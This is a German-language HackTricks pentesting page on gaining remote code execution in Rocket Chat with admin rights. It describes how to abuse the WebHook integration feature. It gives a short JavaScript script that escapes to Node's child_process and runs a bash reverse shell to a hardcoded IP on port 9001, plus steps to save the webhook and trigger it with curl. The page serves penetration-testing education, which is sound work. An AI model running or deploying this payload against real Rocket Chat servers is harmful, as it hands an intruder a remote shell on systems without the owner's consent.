hacktricks/network-services-pentesting/pentesting-web/rocket-chat.md

4.1 KiB

Rocket Chat

{% hint style="success" %} Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %} {% endhint %}

{% embed url="https://websec.nl/" %}

RCE

Wenn du Admin in Rocket Chat bist, kannst du RCE erhalten.

  • Gehe zu Integrationen und wähle Neue Integration und wähle eine: Eingehender WebHook oder Ausgehender WebHook.
  • /admin/integrations/incoming
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • Konfigurieren Sie den WebHook (der Kanal und der Beitrag als Benutzername müssen existieren):
  • Konfigurieren Sie das WebHook-Skript:
  • Änderungen speichern
  • Holen Sie sich die generierte WebHook-URL:
  • Rufen Sie es mit curl auf und Sie sollten die rev shell erhalten

{% embed url="https://websec.nl/" %} {% hint style="success" %} Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks
{% endhint %} {% endhint %}